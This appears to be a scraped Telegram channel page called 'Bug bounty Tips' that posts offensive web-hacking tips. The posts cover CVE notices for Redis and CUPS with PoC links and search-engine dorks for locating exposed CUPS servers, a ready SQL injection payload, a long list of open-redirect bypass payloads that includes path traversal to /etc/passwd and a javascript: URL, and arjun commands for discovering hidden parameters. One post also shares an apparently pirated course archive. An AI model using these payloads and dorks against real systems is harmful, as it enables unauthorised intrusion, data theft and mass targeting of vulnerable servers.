uk
Feedback
Bug bounty Tips

Bug bounty Tips

Відкрити в Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Показати більше
6 037
Підписники
+1224 години
+717 днів
+32530 день
Архів дописів
CVE-2024-31449 and other: Multiple vulnerabilities in Redis, 4.5 - 8.8 rating❗️ Three fresh vulnerabilities allow an attacker
CVE-2024-31449 and other: Multiple vulnerabilities in Redis, 4.5 - 8.8 rating❗️ Three fresh vulnerabilities allow an attacker to perform RCE due to errors in the Lua scripting engine or DoS via malformed Access Control List selectors. Search at Netlas.io: 👉 Link: https://nt.ls/1G7ul 👉 Dork: protocol:redis Vendor's advisory: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5

Worlds fastest unlimited single and bulk subdomain finder! Use desktop! https://cyfare.net/apps/subfind/

photo content

Worlds fastest unlimited single and bulk subdomain finder! Use desktop! https://cyfare.net/apps/subfind/

Exploiting Visual Studio via dump files - CVE-2024-30052 https://ynwarcs.github.io/exploiting-vs-dump-files

TCM - Programming with AI Mini Course hide01.ir.zip336.83 MB

photo content

If you're into generating subdomains quickly 🚀 check out this website: husseinphp.github.io/subdomain/
If you're into generating subdomains quickly 🚀 check out this website: husseinphp.github.io/subdomain/

SQLI Injection CVE: 2024-36837 Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 #BugBounty #Tips

CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution A remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer). PoC: https://github.com/RickdeJager/cupshax This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network. CUPS Report and POC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1 Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8 Search Query:
HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"
P.S. 2.9M+ Services are found on hunter.how yearly

Finally working on this and I will be back becoming more and more better guys so that I can help you guys understand things o
Finally working on this and I will be back becoming more and more better guys so that I can help you guys understand things on how it really works...

you can try this effective manual openredirect Bypass: 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

For finding hidden parameter: arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10  --headers "User-Agent: Mozilla/5.0"

For finding hidden parameter: arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10  --headers "User-Agent: Mozilla/5.0"

photo content

Rufus - Create bootable USB drives the easy way https://rufus.ie/en/